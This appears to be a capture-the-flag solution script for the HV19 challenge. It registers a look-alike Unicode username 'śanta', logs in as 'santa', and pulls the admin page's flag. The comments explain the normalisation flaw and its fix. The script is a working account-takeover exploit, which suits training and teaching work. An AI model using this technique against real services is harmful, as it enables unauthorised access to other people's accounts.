#!/usr/bin/python
import requests
import random
import string
import re
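# Challenge host this script talks to.  The scheme is plain HTTP, so the
# credentials posted below cross the network unencrypted.
BASE_URL = "http://whale.hacking-lab.com:8881"

# Throwaway 8-letter password for the account registered in step 1, drawn from
# the OS entropy source instead of the default pseudo-random generator.
_rng = random.SystemRandom()
PASSWORD = ''.join(_rng.choice(string.ascii_lowercase) for _ in range(8))

# One session for all three requests, so any cookie the server sets at login
# is sent again with the later request to /admin.php.
SESSION = requests.Session()

# Raw string: "\{" in a normal literal is an invalid escape sequence and
# triggers a warning on current Python versions.
FLAG_PATTERN = re.compile(r"HV19\{[^}]*\}")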
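# 1. Register a look-alike of "santa".
# The name sent here starts with an accented "ś", so it is not byte-equal to
# "santa", yet step 2 logs in as plain "santa" with this same password.
# NOTE(review): that only works if registration and login compare usernames
# differently (presumably accent-insensitive matching or normalisation on the
# storage side) -- confirm against the server.  The defensive fix is to
# canonicalise usernames once and enforce uniqueness on that canonical form.
res = SESSION.post(
    BASE_URL + "/register.php",
    data={"username": "śanta", "pwd": PASSWORD, "pwd2": PASSWORD},
    timeout=10,  # do not hang forever on an unresponsive host
)
if res.status_code != 200 or "Registration successful!" not in res.text:
    print("Server returned: %d %s" % (res.status_code, res.reason))
    print(res.text)
    # SystemExit instead of exit(): the latter is a site-module helper and is
    # missing when Python runs with -S.
    raise SystemExit(1)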
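# 2. Log in as plain "santa" (no accent) with the password that step 1 chose
# for the look-alike account.
res = SESSION.post(
    BASE_URL + "/login.php",
    data={"username": "santa", "pwd": PASSWORD},
    timeout=10,  # do not hang forever on an unresponsive host
)
if res.status_code != 200 or "username not found or wrong password!" in res.text:
    print("Server returned: %d %s" % (res.status_code, res.reason))
    print(res.text)
    # SystemExit instead of exit(): the latter is a site-module helper and is
    # missing when Python runs with -S.
    raise SystemExit(1)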
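# 3. Fetch the admin page with the logged-in session and extract the flag.
res = SESSION.get(BASE_URL + "/admin.php", timeout=10)
# NOTE(review): this reuses the login page's error text; whether /admin.php
# ever returns that message is not visible here -- confirm.
if res.status_code != 200 or "username not found or wrong password!" in res.text:
    print("Server returned: %d %s" % (res.status_code, res.reason))
    raise SystemExit(1)

# Print the matched text itself: the repr of a match object truncates long
# matches, and a miss would otherwise print a bare "None" with exit status 0.
flag = FLAG_PATTERN.search(res.text)
if flag is None:
    print("No flag found in the /admin.php response")
    raise SystemExit(1)
print(flag.group(0))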